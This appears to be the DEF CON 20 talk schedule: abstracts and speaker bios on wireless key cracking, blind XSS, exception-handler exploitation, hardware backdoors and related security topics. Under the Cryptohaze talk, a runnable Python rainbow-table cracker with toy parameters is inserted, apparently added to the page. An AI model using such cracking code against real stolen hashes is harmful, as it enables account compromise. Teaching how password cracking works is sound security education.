Welcome & Making the DEF CON 20 Badge

More info to come.






DEF CON Documentary Trailer

As you may have heard, in honor of our 20th anniversary, we have a DEF CON Documentary in the making by none other than Jason Scott of textfiles.com! At the beginning of this hour he will give you a quick sneak peek of the film and maybe discuss a few juicy tidbits!





Before, During, and After

When Gail Thackeray first spoke at DEF CON 1 there was no world wide web, state sponsored computer warfare was the stuff of science fiction, and international mafias had yet to become major players in computer crime. Internationally known for her role in Operation Sundevil, the former prosecuting attorney will discuss the changes in the computer security legal landscape since she first spoke at DEF CON. She will also discuss the evolution of the relationship between the computer security researcher community and law enforcement and government.



Twenty years ago, Dead Addict practically begged Gail Thackeray to appear at DEF CON, even though she was actively prosecuting several of his close friends. Since then the government (law enforcement, military, and intelligence community) has actively participated in DEF CON, to the point where we’ve been given the moniker ‘FED CON’. Dead Addict will discuss the evolving relationship between government, the hacker community, and the civil liberties community. While obviously at odds with each other in some areas, there is also shared ground between these groups. This year he was happy to be able to invite Gail again, this time not begging as much, and thankfully she isn’t prosecuting any of his friends.



Following their talk, Gail and Dead Addict will give a special introduction to our Special Guest Speaker [REDACTED], [REDACTED] of the [REDACTED] and [REDACTED].



Gail Thackeray is a former Assistant Attorney General and Special Counsel recently retired from the Arizona Attorney General's Office. Her career prosecuting electronic crimes included the investigation and prosecution of early infrastructure attacks on a telephone network and a power company, as well as numerous fraud, cyberstalking and intrusion crimes. She participated in the nationwide Secret Service hacker investigation known as "Operation Sundevil" and attended the first Defcon Conference. She currently works at the Arizona Counter Terrorism Information Center as a computer forensic examiner. She has a B.A. from Vassar College, a J.D. from Syracuse University, and earned the CFCE forensics certification from the International Association of Computer Investigative Specialists (IACIS).



20 years ago, Dead Addict helped organize the first DEF CON. He has been part of the staff ever since. In the years since DEF CON began, DA has worked for companies large and small, helping secure mobile platforms, operating systems, and financial infrastructures. In addition to being given the opportunity to speak at DEF CON, Shmoocon, Black Hat, Notacon and others, he constantly feels privileged at the company he has been able to keep. He is currently a wandering rōnin and aspiring curmudgeon that can be reached at da@defcon.org or daddict@gmail.com.


DC 101 Thursday Talks

Cracking Wireless encryption keys is a fundamental capability that should be in every penetration tester's skill set. This talk will walk you through the basic steps necessary to break Wireless Encryption Protocol (WEP) and steps to perform dictionary and brute force attacks against Wi-Fi Protected Access (WPA & WPA2).



DaKahuna works as a Systems Engineer for a small defense contractor in the Washington DC metro area. By day he works with large government agencies reviewing network and security architectures, reviewing information assurance and information security policies and guidance, and advising on matters of policy and governance. By night he enjoys snooping the airwaves, be it the amateur radio bands or his neighbors' wireless networks. He is a father of two, a 24-year Navy veteran and holder of an amateur radio Extra Class license.




Putting up a flag and asking for help on the Internet is not for the faint of heart. When you simply want to get started with information security, hacking or just playing around with the vulnerabilities of computer systems, asking the right question to the right person is a crap shoot. Tired of being on the outside looking in? This 101 talk will help you get your feet wet! It will provide you the basic knowledge required when starting out in the InfoSec scene. Afraid to ask someone what the best NMap toggles are? Can't even get your metasploit running? Having trouble decoding your tcpdumps? We can help! Spend 50 min. with us and jump start the next 50 years of your life!



Ripshy is a long time tinkerer who has been a part of the DEF CON community for the past 10 years, attending his first con at the Jail bait age of 15. He has worked in various roles touching multiple points of the info sec rainbow, and is currently working with Sony PlayStation doing magical things with little more than curiosity and a keyboard. Ripshy is an OG member of the Vegas 2.0 crew, a founding member of GayHackers, and works as a goon in the DEF CON NOC.



Hackajar has been involved in DEF CON in one form or another for over a decade. He's a founding member of Vegas 2.0, a Contest Goon, and the brains behind "The Summit". He currently heads a Silicon Valley Hacker Space and various security shenanigans.


YOU: are part of the problem. You should count yourself among the ranks of the unprepared. You are under-educated and fooling yourself. You are sheep, you just don’t know any better… but ignorance is no excuse. You know that much.



Navigating the world of Social Engineering is often portrayed with the image of “Jedi mind-tricks” and labeled with terms like “The Art of Deception”… These are all just ploys to convey mysticism, sell books and add value to a skill based on common sense, perception and the ability to think further than the end of your own nose.



It’s time to remove the wool and learn what Social Engineering is and how it works. Welcome to a crash course in the oldest CLI…. Bring a helmet.



Siviak: A contributor to DEF CON for 14+ years and a geek for over 30, Siviak is considered by some as a trusted* (*citation needed) authority in the area of Social Engineering, considered by others to be a complete asshole and considered by himself, often.



Siviak has talked with, listened to, pontificated at, entertained, debated, challenged, hoodwinked, and exchanged booze with a great number of us over the years. He is one of the originating voices behind the Lackey Program, undisputed ruler of the Scavenger Hunt, winner of more black badges than any other attendee in history and a proud member of 23b.




DEF CON 101

DC101 is the Alpha to the closing ceremonies' Omega. It's the place to go to learn about the many facets of Con and to begin your Defconian Adventure. Whether you're a n00b or a long time attendee, DC101 can start you on the path toward maximizing your DEF CON Experiences.



HighWiz █████ █████ █████ ███ ████, ███████████ ██████████ ████. ██████ ████████ ████ ██ ████ ████████ ██ ██████████ ██████ █████████. ██ █████████ █████ ███████ ████ █████████ ███████. ███████ ███████ ███ ██ ███ █████████ ████ █████████ █████ █████████. ███████ ██████ █████, █████████ ██ █████████ ███, ████████ ██ █████. ███ ███ █████ █████ █████ █████████ ███████. █████████ ███████ ██████ ██████. ███████ ██ ██████ ████, ██ ████████ █████. ███████ ██ ██████████ █████. █████████ █████████, █████ ███ ████████ █████████, █████ █████ ███████ ██████, ██ ████████████ ██████.



Pyr0 is the asshole who oversees the Contests and Events at DEF CON. He's been attending since DEF CON 6 and a goon since DEF CON 7. One of those 3 0 3 peoples and also rolls deep with Security Tribe. Loves good vodka, smart girls, explosives, and big black . . . guns. Has the ability to tell a man to go to hell so that he looks forward to the trip. ALSO:DONGS



Roamer is the Senior Goon in charge of the Vendor Area. He has been on DEF CON staff since DEF CON 8. He was the founder of the DEF CON WarDriving contest for the first 4 years of its existence and has also run the slogan contest in the past. Roamer is the lead guitarist in the Goon Band, Recognize (despite what you may read in Gm1's bio). Although having no actual skills, his ability to out-drink virtually every Goon and attendee under the table has gained him massive prominence in the scene and elevated him to the lofty station you see him in today.



Lockheed is the Sr. Goon in charge of the DEF CON Network Operations Group since DEF CON 4. Professionally, Lock has over 25 years of experience in the technology field. He's had jobs ranging from lowly tech writer, mainframe operator, product engineer, product marketing manager, and is currently Sr Director in charge of the Global IT Group for Sony PlayStation Worldwide Studios, managing staff across the globe. He's been in the video game industry for almost 10 years now.



AlxRogan was born and raised in the Oil and Gas industry, and has worked (off and on) there since 1995. In his work experience, he has consulted for energy generating companies, health care providers, US and local government, and education/research institutions. He is currently the Information Security Architect for a mid-size oil and gas company in Houston. He also enjoys mopery.



LoST: With a background in mathematics and robotics, LosT spends his free time between calculating how to take over the world and building the robots to accomplish it. Deciding to teach others how to create robot overlords, he created the Hardware Hacking Village for the DEF CON community with Russ in an effort to get more people involved with hardware. Fearing competition, LosT devised the Mystery Challenge to confuse and confound those who would rise up against him, eventually becoming the creator of the badges to that same end. Really he just wants to juggle and read books these days, or watch MST3K with Tom.



Flipper is the new guy on the panel. DEF CON 19 was his first DEF CON, and he was on the team that went on to victory in the Scavenger Hunt. Last year he applied his experience from robotics competitions to survive several days of sleepless insanity. He is back again this year to talk about the whole DEF CON experience from the perspective of a newcomer. His day job finds him being an expert in underwater robotics.

Twitter: @NickFlipper

Flipper on G+




Have you ever wondered how you can translate your mad skillz into an actual job? Does coming to DEF CON even help you get there? Four members of the DEF CON staff will astound you with the stories of how they took their experiences at DEF CON and turned them into the jobs of their dreams. Despite using their DEF CON experiences to obtain these jobs, they represent four completely different industries: Government, Energy, Health Care, and the Video Game Industry, in a variety of different job functions. Learn from their experience and find out what they look for from the community when they need to fill positions in their respective industries.



Roamer is the Senior Goon in charge of the Vendor Area. He has been on DEF CON staff since DEF CON 8. He was the founder of the DEF CON WarDriving contest for the first 4 years of its existence and has also run the slogan contest in the past. Roamer is the lead guitarist in the Goon Band, Recognize (despite what you may read in Gm1's bio). Although having no actual skills, his ability to out-drink virtually every Goon and attendee under the table has gained him massive prominence in the scene and elevated him to the lofty station you see him in today.



Lockheed is the Sr. Goon in charge of the DEF CON Network Operations Group since DEF CON 4. Professionally, Lock has over 25 years of experience in the technology field. He's had jobs ranging from lowly tech writer, mainframe operator, product engineer, product marketing manager, and is currently Sr Director in charge of the Global IT Group for Sony PlayStation Worldwide Studios, managing staff across the globe. He's been in the video game industry for almost 10 years now.



AlxRogan was born and raised in the Oil and Gas industry, and has worked (off and on) there since 1995. In his work experience, he has consulted for energy generating companies, health care providers, US and local government, and education/research institutions. He is currently the Information Security Architect for a mid-size oil and gas company in Houston.






Fuck a bunch of skiddie tools acquired from bobo forums. One does not have to be a master to write their own shit. Yoda said it best: get off your dick and write yourself some Python (just don't show it to Highwiz, he might bite it). Also always remember to stay in the wizard's good graces or you will find yourself publicly humiliated. You can come to this talk and find out how to be humiliated publicly, but also: learn some Python from a hacker's perspective. Oh yea: Dongs, Schlongs, and Turds



Terrence "tuna" Gareau: If drinking and getting fat was a job, Terrence “tuna” Gareau would be a rich and happy person. He has spent his years growing up with a terminal on his dong. There is nothing more satisfying to this poor bloke than hacking something to find a new purpose or use for it. This love for hacking has gone so far that he does not know how to interact with humans or the opposite sex and has left him a 26-year-old virgin.






Since this is DC101, I've got some things I want to get off my chest: a brief overview of 'foundational' hacker knowledge that I personally believe all hackers should have or would want. From subculture references to numerical oddities, this will be a meat space core dump of an ADD-OCD hacker. (ADD-OCD: I'm constantly changing what I'm completely obsessed about.) Topics will include mathematics, linguistics, programming, hardware, DEF CON, robotics, and more. A veritable cornucopia of fun. Or not.



LoST: With a background in mathematics and robotics, LosT spends his free time between calculating how to take over the world and building the robots to accomplish it. Deciding to teach others how to create robot overlords, he created the Hardware Hacking Village for the DEF CON community with Russ in an effort to get more people involved with hardware. Fearing competition, LosT devised the Mystery Challenge to confuse and confound those who would rise up against him, eventually becoming the creator of the badges to that same end. Really he just wants to juggle and read books these days, or watch MST3K with Tom.






Everyone relies on their locks to keep things secure. From front doors to filing cabinets, they give us the sense of security that no one else can get inside without the proper key. However, in reality, most locks can be picked trivially without any evidence of exploitation. You will learn how and why lockpicking works as well as what manufacturers have done to protect against such shenanigans.



Dr. Tran is a security professional in Switzerland by day, but some say he’s a super-secret agent by night. He’s been tinkering and taking apart technology since childhood, but hasn’t necessarily figured out how to reassemble it. When Robert is not wrenching on motor vehicles or traveling the world, he’s picking locks. He’s been an active member of TOOOL for over 3 years and has taught at conferences including Shmoocon, CarolinaCon, NotaCon, Security BSides, QuahogCon, HOPE, & DEF CON.






Movie Night With The Dark Tangent: "Code2600" + Q&A With the Director

DEF CON is happy to announce Code 2600 will be showing at DEF CON 20! We will be the first hacker con to have the film shown and we are pretty excited about it. The filmmaker will be present and doing a Q & A after the screening! Check out code2600.com for more info!



About the film:



CODE 2600 documents the rise of the Information Technology Age as told through the events and people who helped build and manipulate it. The film explores the impact this new connectivity has on our ability to remain human while maintaining our personal privacy and security. As we struggle to comprehend the wide-spanning socio-technical fallout caused by data collection and social networks, our modern culture is trapped in an undercurrent of cyber-attacks, identity theft and privacy invasion. Both enlightening and disturbing, CODE 2600 is a provocative wake-up call for a society caught in the grips of a global technology takeover.



The Cast:

Bruce Schneier, Chief Security Technology Officer, BT

Jeff Moss, Founder, DEF CON and Black Hat

Marcus Ranum, Chief Security Officer, Tenable Security

Jennifer Granick, Civil Liberties Director, EFF

Dr. Bob Lash, Original Member of the Homebrew Computer Club

Eric Michaud, Founder, Pumping Station One

Gideon Lenkey, Security, CEO RA Security Systems

Lorrie Cranor, Cylab, Carnegie Mellon University

Phil Lapsley, Phone Phreaking Expert, Author

Robert Vamosi, Computer Security Journalist, Author

Wallace Wang, Author, "Steal This Computer Book"

Gideon Lenkey, Co-Founder, Ra Security Systems






Movie Night With The Dark Tangent: "Reboot" + Q&A With the Filmmakers and Actors

We are very excited to announce an Exclusive Sneak Preview screening of the film Reboot at DEF CON 20! Here is a peek at the premise from an article on the film:



"Set within a dystopian world that is a collision between technology and humanity, "Reboot" touches upon many of the current social and political concerns that arise from becoming more and more intertwined with the virtual.



In contemporary Los Angeles, a young female hacker (Stat) awakens from unconsciousness to find an iPhone glued to her hand and a mysterious countdown ticking away on the display. Suffering from head trauma, and with little recollection of who she is or what is happening, Stat races against time to figure out what the code means, and what unknown event the pending zero-hour will bring."



We are also excited that the filmmakers and lead cast members will be on hand at DEF CON for a Q&A session along with the screening! We'll have more info as this solidifies.



If you are looking for a fun gaming challenge, Reboot has a cool alternate reality game in which you can participate as well! Find more info at http://www.rebootfilm.com/scoreboard.






Movie Night with The Dark Tangent: "We Are Legion: The Story of the Hacktivists"

"We Are Legion: The Story of the Hacktivists” is a documentary that takes us inside the world of Anonymous, the radical “hacktivist” collective that has redefined civil disobedience for the digital age. The film explores the historical roots of early hacktivist groups like Cult of the Dead Cow and Electronic Disturbance Theater and then follows Anonymous from 4chan to a full-blown movement with a global reach, one of the most transformative of our time.



We might even get lucky and have some cast and crew in attendance for a short Q&A!






Movie Night With The Dark Tangent: "21" + Q&A With "MIT Mike" Aponte

Join us for a screening of the hit movie "21" and stick around for a Q&A session with "MIT Mike" Aponte, the real-life inspiration for the character "Jason Fisher".



"MIT Mike" Aponte: Mike Aponte is a world-renowned blackjack player, gaming consultant and professional speaker. Mike was the leader of the MIT Blackjack Team, a high stakes card-counting team that legally won millions at 21 using mathematics and an ingenious approach. Mike was one of the main characters in the New York Times bestseller, Bringing Down the House, which inspired the major motion picture, 21.



Drawing on 20 years of professional blackjack experience, Mike teaches players how to turn 21 into a lucrative money maker. Blackjack is unique because, unlike other casino games, it is a true game of skill. The decisions you make actually determine whether you will win or lose over the long run. The beauty of blackjack is that for every playing decision there is one and only one correct play, and for every betting decision there is one and only one optimal bet.



Professional blackjack is both an art and a science. In addition to learning the optimal strategies, you must also develop the skills to apply that knowledge effectively. Mike teaches his clients how to develop a high skill level using the same training methods and techniques he used when he managed the MIT Team. If you're tired of losing to the casinos or are entrepreneurially minded and seeking a new and exciting skill, Mike can help you turn blackjack into a winning investment.



Accomplishments:

In addition to being one of the MIT Blackjack Team’s most successful players, Mike was also responsible for recruiting, player development and strategic analysis. In 2004, Mike won the first World Series of Blackjack championship, competing against the best blackjack players in the world. Mike speaks professionally for corporations and universities and also consults on the mathematics of gaming.






Shared Values, Shared Responsibility

We as a global society are extremely vulnerable and at risk for a catastrophic cyber event. Global society needs the best and brightest to help secure our most valued resources in cyberspace: our intellectual property, our critical infrastructure and our privacy. DEF CON has an important place in computer security. It taps into a broad range of talent and provides an unprecedented diversity of experiences and expertise to solve tough problems. The hacker community and USG cyber community share some core values: we both see the Internet as an immensely positive force; we both believe information increases in value by sharing; we both respect protection of privacy and civil liberties; we both believe in the need for oversight that fosters innovation, doesn’t pick winners and losers, and retains freedom and flexibility; we both oppose malicious and criminal behavior. We should build on this common ground because we have a shared responsibility to secure cyberspace.



General Keith B. Alexander is the Commander, U.S. Cyber Command (USCYBERCOM) and Director, National Security Agency/Chief, Central Security Service (NSA/CSS). As Commander, USCYBERCOM, he oversees planning, coordinating and conducting operations and defense of DoD computer networks. As Director, NSA/Chief, CSS, he oversees a DoD agency with national foreign intelligence, combat support, and U.S. national security information system protection responsibilities. GEN Alexander holds a B.S. from the U.S. Military Academy, a M.S. in Business Administration from Boston University, a M.S. in Systems Technology (Electronic Warfare) and a M.S. in Physics from the Naval Post Graduate School, and a M.S. in National Security Strategy from the National Defense University.


Owning Bad Guys {And Mafia} With Javascript Botnets

Man in the middle attacks are still one of the most powerful techniques for owning machines. In this talk, MITM schemes in anonymous services are going to be discussed. Then attendees will see how easily a botnet using JavaScript can be created to analyze those kinds of connections, and some of the actions the people behind those services are actually doing. It promises to be funny.



Chema Alonso is a Security researcher with Informatica64, a Madrid-based security firm. Chema holds Computer Science and System Engineering degrees from Rey Juan Carlos University and Universidad Politècnica de Madrid, respectively. During his more than eight years as a security professional, he has consistently been recognized as a Microsoft Most Valuable Professional (MVP). Chema is a frequent speaker at industry events (Microsoft Technet / Security Tour, AseguraIT) and has been invited to present at information security conferences worldwide including Yahoo! Security Week, Black Hat Briefings, ShmooCON, DeepSec, HackCON, Ekoparty and RootedCon. He is a frequent contributor to several technical magazines in Spain, where he is involved with state-of-the-art attack and defense mechanisms, web security, general ethical hacking techniques and FOCA.

Twitter: @chemaalonso

http://www.elladodelmal.com

www.informatica64.com



Manu has been working in all security areas since he got into Informatica64. He is a security pentester, a developer coding on projects like FOCA, and a very good security researcher in areas such as Connection String Parameter Pollution Attacks or malware. He has the honor of being the man behind some of the most powerful "C# spaghetti lines" of FOCA.


The Darknet of Things, Building Sensor Networks That Do Your Bidding

The Internet of Things... It is coming. Wearing hardware that communicates across the Internet is starting to become a reality, chips are getting smaller, and as a society we are connected all the time... Building these devices is easier than we thought, and putting them onto a network that is ours... EVEN BETTER! Come experience the Darknet of Things. Learn what we built, how we built it, and why. Learn how to get involved with a new community project, and see what some of the DEF CON groups have been working on. Most importantly, learn how you can connect to the Darknet of Things.



Anch: Just a lowly hacker out in Oregon, POC for DC503, Designer of the Network, and happily connected to the matrix.

Twitter: @boneheadsanon

http://www.dcgdark.net



Omega: Hardware hacker extraordinaire. Member of DC503, Designer of things, and thinks he should have taken the RED pill.


Drones!

Thanks to the plummeting cost of powerful motion sensors like those found in smartphones, the technology to create military-class autopilots is available to all. Over the past five years, the DIY Drones community has created a series of open source unmanned aerial vehicles (UAV), from fully-autonomous planes, helicopters, quadcopters, hexacopters, rovers and more, which cost just a few hundred dollars -- less than 1% the cost of equivalent military drones. As a result there are now more than 10,000 of them in use -- more than the US Military. As DIY drones go mainstream, what are the practical applications that will emerge, and the legal, ethical and economic implications? How does open source change the regulatory aspects of drones? And will the rise of "personal drones" have a similar social impact as "personal computers" did?

Chris Anderson is the Editor in Chief of Wired. He is the author of the New York Times bestsellers The Long Tail and FREE: The Future of a Radical Price, and the forthcoming Makers: The New Industrial Revolution. He is also founder of 3D Robotics, an open source robotics company.




<ghz or bust: DEF CON

Wifi is cool and so is cellular, but the real fun stuff happens below the GHz line. Medical systems, manufacturing plant/industrial systems, cell phones, power systems: it's all in there!



atlas and some friends set out to turn pink girltech toys into power-systems-attack tools. Through several turns and changes, the cc1111usb project was born, specifically to make attacking these systems easier for all of you. With a $50 usb dongle, the world of ISM sub-GHz is literally at your fingertips.



New and improved! If you missed it at shmoocon, here's your chance to see the intro to this fun new world. If you caught it at shmoo, come to the talk and prove your <ghz prowess and wirelessly hack a special pink girl's toy target!



atlas is a doer of stuff. Inspired by the illustrious sk0d0, egged on by invisigoth of kenshoto, atlas has done a lot of said 'stuff' and lived to talk about it. Whether he's breaking out of virtual machines, breaking into banks, or breaking into power systems, atlas is always entertaining, educational and fun.

Twitter: @at1as


Blind XSS

This talk will announce the release of, and demonstrate, the xss.io toolkit. xss.io is a platform to help ease cross-site scripting (XSS) exploitation and, specifically for this talk, the identification of blind XSS vectors. Think drag-and-drop exploits after XSS vulnerability identification. For blind XSS, xss.io is a callback and hook manager for intel collected by executed and non-executed but accessed payloads.



Adam "EvilPacket" Baldwin has over 10 years of mostly self-taught computer security experience and is currently the Chief Security Officer at &yet. He at one time possessed a GCIA and, if his CPEs are up to date, should still have a CISSP. Prior to starting at &yet, Adam operated a security consultancy, nGenuity, and worked for Symantec. Adam is a minor contributor to the W3AF project, creator of the DVCS pillaging toolkit and of helmet, the security header middleware for node.js, and has previously spoken at DEF CON, Toorcon, Toorcamp, DjangoCon, and JSconf.

Twitter: @adam_baldwin

http://evilpacket.net


Should the Wall of Sheep Be Illegal? A Debate Over Whether and How Open WiFi Sniffing Should Be Regulated

Prompted by the Google Street View WiFi sniffing scandal, the question of whether and how the law regulates interception of unencrypted wireless communications has become a hot topic in the courts, in the halls of the FCC, on Capitol Hill, and in the security community. Are open WiFi communications protected by federal wiretap law, unprotected, or some strange mix of the two? (Surprise: it may be the last one, so you'll want to come learn the line between what's probably illegal sniffing and what's probably not.)

More importantly, what *should* the law be? Should the privacy of those who use WiFi without encryption be protected by law, or would regulating open WiFi sniffing pose too great a danger to security research and wireless innovation, not to mention DEF CON traditions like the Wall of Sheep? Do we need to protect the sheep from the hackers, or the hackers from the law, or can we do both at the same time? Join legal expert Kevin Bankston and technical expert Matt Blaze as they square off in a debate to answer these questions, moderated by Jennifer Granick. (Surprise: the lawyer is the one arguing for regulation.)



Kevin Bankston is Senior Counsel and Director of the Free Expression Project at the Center for Democracy & Technology, a Washington, DC-based non-profit organization dedicated to promoting democratic values and constitutional liberties in the digital age. Prior to joining CDT in February 2012, he was a Senior Staff Attorney for the Electronic Frontier Foundation (EFF) specializing in free speech and privacy law with a focus on government surveillance, Internet privacy, and location privacy. At EFF, he regularly litigated issues surrounding location privacy and electronic surveillance, and was a lead counsel in EFF’s lawsuits against the National Security Agency and AT&T challenging the legality of the NSA’s warrantless wiretapping program. From 2003-05, he was EFF's Equal Justice Works/Bruce J. Ennis Fellow, studying the impact of post-9/11 anti-terrorism surveillance initiatives on online privacy and free expression. Before joining EFF, he was the Justice William J. Brennan First Amendment Fellow for the American Civil Liberties Union, where he litigated Internet-related free speech cases. He received his J.D. in 2001 from the University of Southern California and his undergraduate degree from the University of Texas.

Twitter: @kevinbankston

http://www.cdt.org



Matt Blaze directs the Distributed Systems Lab at the University of Pennsylvania, where he teaches hackers to be scientists and scientists to be hackers.

Twitter: @mattblaze

http://www.crypto.com



Jennifer Granick is the General Counsel of Worldstar, LLC. Prior to joining WorldStarHipHop, Granick was an attorney at ZwillGen PLLC from 2010-2012 and the Civil Liberties Director at the Electronic Frontier Foundation from 2007-2010. Previously, Granick served as the Executive Director of the Center for Internet and Society at Stanford Law School where she was a lecturer in law. She founded and directed the Law School's Cyberlaw Clinic where she supervised students in working on some of the most important cyberlaw cases that took place during her tenure. She is best known for her work with intellectual property law, free speech, privacy, and other things relating to computer security, and has represented several high profile hackers.

Twitter: @granick

http://www.granick.com




Cryptohaze Cloud Cracking

Bitweasil goes through the latest developments in the Cryptohaze GPU-based password cracking suite. WebTables is a new rainbow table technology that eliminates the need to download rainbow tables before using them, and the new Cryptohaze Multiforcer is an open source, GPLv2, network-enabled platform for password cracking that is easy to extend with new algorithms for specific targets. The Cryptohaze Multiforcer supports CUDA, OpenCL, and CPU code (SSE, AVX, etc.). All of this is aimed at either the pentester who can't spray hashes to the internet, or the hacker who would rather not broadcast what she obtained to pastebin scrapers.
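As an added illustration of the technique the suite implements (this is not Cryptohaze code, and the page does not describe how WebTables serves its tables, so nothing here claims to), the Python below is a complete rainbow table: chain generation with a per-column reduction function, endpoint-only storage, and the online lookup with replay verification to reject false alarms caused by chain merges. The hash (4-byte truncated MD5), alphabet, chain length and number of chains are toy choices so it builds and searches in well under a second.

```python
import hashlib
from typing import Dict, Iterable, Optional

# Toy parameters: a 3-digit numeric keyspace (1,000 candidates), chains of 30
# and a 4-byte truncated MD5, so the table builds and searches in well under a
# second. Real tables use the full hash, far longer chains and large charsets.
ALPHABET = "0123456789"
PASSWORD_LEN = 3
KEYSPACE = len(ALPHABET) ** PASSWORD_LEN
CHAIN_LEN = 30
HASH_BYTES = 4


def toy_hash(plaintext: str) -> bytes:
    """The unsalted hash under attack; truncated MD5 stands in for LM/NTLM/MD5."""
    return hashlib.md5(plaintext.encode()).digest()[:HASH_BYTES]


def reduce_hash(digest: bytes, column: int) -> str:
    """Map a hash back into the keyspace. Folding the column index in gives
    every column its own reduction function, so chains that collide in
    different columns do not merge; that is the rainbow-table refinement of
    Hellman's single-function time/memory trade-off."""
    n = (int.from_bytes(digest, "big") + column) % KEYSPACE
    chars = []
    for _ in range(PASSWORD_LEN):
        chars.append(ALPHABET[n % len(ALPHABET)])
        n //= len(ALPHABET)
    return "".join(chars)


def build_table(start_points: Iterable[str]) -> Dict[bytes, str]:
    """Precomputation: walk each chain and store only (final hash -> start).
    Every intermediate value is recomputed on demand during lookup."""
    table: Dict[bytes, str] = {}
    for start in start_points:
        p = start
        for column in range(CHAIN_LEN - 1):
            p = reduce_hash(toy_hash(p), column)
        table[toy_hash(p)] = start
    return table


def lookup(table: Dict[bytes, str], target: bytes) -> Optional[str]:
    """Online phase. For each column the target might occupy, roll forward to
    the chain end, look the end up, and on a hit replay the chain from its
    start to confirm: merges still happen, so an endpoint match can be a
    false alarm that the replay rejects."""
    for column in range(CHAIN_LEN - 1, -1, -1):
        if column == CHAIN_LEN - 1:
            end = target
        else:
            p = reduce_hash(target, column)
            for later in range(column + 1, CHAIN_LEN - 1):
                p = reduce_hash(toy_hash(p), later)
            end = toy_hash(p)
        start = table.get(end)
        if start is None:
            continue
        p = start
        for earlier in range(column):
            p = reduce_hash(toy_hash(p), earlier)
        if toy_hash(p) == target:
            return p
    return None


def default_start_points() -> Iterable[str]:
    """Start points spread over the keyspace: 200 chains x 30 columns for a
    1,000-candidate space, deliberately oversubscribed so merges are visible."""
    return (f"{i:0{PASSWORD_LEN}d}" for i in range(0, KEYSPACE, 5))


def coverage(table: Dict[bytes, str]) -> float:
    """Fraction of the keyspace the table really recovers; merges cost coverage."""
    hits = 0
    for i in range(KEYSPACE):
        if lookup(table, toy_hash(f"{i:0{PASSWORD_LEN}d}")) is not None:
            hits += 1
    return hits / KEYSPACE


if __name__ == "__main__":
    table = build_table(default_start_points())
    stolen = toy_hash("428")  # the only thing the attacker holds
    print("recovered plaintext:", lookup(table, stolen))
    print("table entries: %d, coverage: %.1f%%" % (len(table), 100 * coverage(table)))
```

Run it and compare `len(table)` with the 200 chains you started: merged chains overwrite each other's endpoint, which is why the coverage figure stays below 100% and why real tables are generated with perfect-table filtering or simply more chains.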



Bitweasil is the primary developer on the open source Cryptohaze tool suite, which implements network-clustered GPU accelerated password cracking (both brute force & rainbow tables). He has been working with CUDA for over 4 years (since the first public release on an 8800GTX), OpenCL for the past 2 years, and enjoys SSE2 as well. Bitweasil also rescues ferrets.

Twitter: @Bitweasil

http://www.cryptohaze.com


Overwriting the Exception Handling Cache Pointer - Dwarf Oriented Programming

This presentation describes a new technique for abusing the DWARF exception handling architecture used by the GCC tool chain. This technique can be used to exploit vulnerabilities in programs compiled with or linked to exception-enabled parts. Exception handling information is stored in bytecode format, executed by a virtual machine during the course of exception unwinding and handling. We show how a malicious attacker could gain control of those structures and inject bytecode for malicious purposes. This virtual machine is actually Turing-complete, which means that it can be made to run arbitrary attacker logic.



Rodrigo Rubira Branco (BSDaemon) is the Director of Vulnerability & Malware Research at Qualys. In 2011 he was honored as one of the top contributors to Adobe vulnerabilities in the past 12 months. Previously, as Chief Security Researcher at Check Point, he founded the Vulnerability Discovery Team (VDT) and released dozens of vulnerabilities in many important software packages. Prior to that, he worked as Senior Vulnerability Researcher at COSEINC, as Principal Security Researcher at Scanit, and as Staff Software Engineer in the IBM Advanced Linux Response Team (ALRT), also working in the IBM Toolchain (Debugging) Team for the PowerPC architecture. He is a member of the RISE Security Group and the organizer of Hackers to Hackers Conference (H2HC), the oldest security research conference in Latin America. He has been an accepted speaker at many security and open-source events, including H2HC, HITB, XCon, VNSecurity, OLS, DEF CON, Hackito, Ekoparty, Troopers and others.



James Oakley came to computer programming by way of microcontroller programming. He enjoys hands-on work with low level systems. His interests include computer graphics, digital electronics, security, and operating systems. In his unprofessional time he enjoys backpacking, science fiction, and designing games. He graduated from the Computer Science program at Dartmouth College.



Sergey Bratus is a Research Assistant Professor of Computer Science at Dartmouth College. He tries to help fellow academics to understand the value and relevance of hacker research. He enjoys wireless and wired network hacking, kernel rootkits and hardening patches, and spoke on various topics at Shmoocon, Toorcon, DEF CON, and Black Hat. He has a Ph.D. in Mathematics from Northeastern University, and worked at BBN Technologies on natural language processing research before coming to Dartmouth.

Twitter: @sergeybratus


Exploit Archaeology: Raiders of the Lost Payphones

Payphones. Remember those? They used to be a cornerstone of modern civilization, available at every street corner, gas station, or any general place of commerce. For decades, hackers and phone phreaks crowded around them as an altar to high technology and a means to "reach out and touch someone".



Fast forward to today: most people have mobile phones. Payphones installed decades earlier are now more of a memorial to a time long gone by. Covered with grime and graffiti, forgotten, relegated to the realm of drug dealers and other undesirables. But they're still around, and they're more vulnerable than ever.



This talk will review modern hacking techniques applied to retro hardware. We'll cover owning payphones and how they can be retrofitted with new technologies to turn them into the ultimate low-profile hacking platform for compromising your organization's network. There will be demos of payphone hacking on stage, as well as using the payphone to intercept voice phone traffic. We'll also reveal a new tool to automate the exploitation of payphones and relate how (as with all forms of archaeology) learning about old platforms can help us secure modern architectures.



Joshua Brashars is a penetration tester and a member of DC949. He prefers to break things instead of make them.



Joshua has presented at several notable security conferences, including Toorcon San Diego, Toorcon Seattle, Thotcon, Baythreat and HOPE. Joshua has also contributed to several titles with Syngress Publishing.

Twitter: @savant42


Hardware Backdooring is Practical

This presentation will demonstrate that permanent backdooring of hardware is practical. We have built a generic proof-of-concept malware for the Intel architecture, Rakshasa, capable of infecting more than a hundred different motherboards. The first net effect of Rakshasa is to disable NX permanently and remove SMM-related fixes from the BIOS, resulting in a permanent lowering of the security of the backdoored computer, even after complete erasure of the hard disks and reinstallation of a new operating system. We shall also demonstrate that preexisting work on MBR subversion, such as bootkiting and preboot authentication software bruteforcing, can be embedded in Rakshasa with little effort. Moreover, Rakshasa is built on top of free software, including the Coreboot project, meaning that most of its source code is already public. This presentation will take a deep dive into Coreboot and hardware components such as the BIOS, CMOS and PIC embedded on the motherboard, before detailing the inner workings of Rakshasa and demoing its capabilities. We hope to raise the security community's awareness of the dangers associated with the non-open-source firmware shipped with any computer and to question its integrity. This should also result in upgrading the best practices for forensics and post-intrusion analysis to include the aforementioned firmware in their scope of work.
